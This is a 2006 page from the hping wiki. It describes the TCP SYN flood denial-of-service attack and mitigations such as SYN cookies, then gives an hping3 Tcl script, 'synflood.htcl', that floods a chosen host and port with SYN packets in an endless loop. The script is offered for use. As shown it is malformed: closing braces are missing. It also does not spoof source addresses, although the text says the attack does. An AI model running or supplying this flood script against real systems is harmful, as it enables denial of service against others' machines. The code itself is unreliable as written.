hping wiki

!!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).

The goal of this attack is to send TCP connection requests faster than a machine can process them in order to saturate the resources and prevent the machine from accepting any more connections. Actually the attacker does not create a whole TCP connection, but just send a SYN packet (the first packet required to start a TCP connetion), spoofing at random the source IP address, so from the attacker point of view the resource to perform the attack is only the bandwidth because there is no state to take. Modern operating systems are able to handle resources better than in the past, or to use cryptographic techniques (like Syn cookies or RST cookies) to mitigate the problem (and allocate memory only after the third packet of a new TCP connection reached the host), but still the attack can create some problem. A simpler way to face it, that is somewhat effective and yet very simple, is to drop a connection at random if there are too many open connections.

This wiki is nothing without code, so here we go (as .htcl file).....
# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

if {$argc < 2} {
  puts "Required arguments: hostname dstport"
  exit 1

foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]

puts "Synflooding $target..."

while {1} {
  hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"

Edit this page Upload file Page history - Page last update: Thu Jan 12 07:33:52 GMT 2006 by | Your address: | Admin